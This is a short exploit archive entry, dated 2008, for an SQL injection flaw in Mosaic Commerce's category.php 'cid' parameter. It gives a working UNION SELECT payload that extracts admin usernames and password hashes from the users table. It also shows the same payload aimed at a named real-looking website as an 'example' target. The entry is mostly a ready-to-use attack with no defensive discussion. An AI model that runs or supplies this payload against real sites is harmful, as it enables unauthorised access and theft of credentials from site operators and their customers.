[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Mosaic Commerce (category.php cid) SQL Injection Vulnerability
# Published : 2008-10-16
# Author : Ali Abbasi
# Previous Title : CafeEngine Multiple Remote SQL Injection Vulnerabilities
# Next Title : Mic_blog 0.0.3 (SQL Injection/Privilege Escalation) Remote Exploit


Mosaic Commerce SQL Injection Vulnerability
Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir]
Mazandaran University Of Science And Technology
Network Security Research Center
Babol, Iran
http://cyber-defence.com
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
 
 
  {SQL BUG}
  /mosaic-path/category.php?cid=[SQL]
 
  Exploit For Get Admin Username And Password Hash:
  category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
 

Example:

http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*

# www.Syue.com [2008-10-16]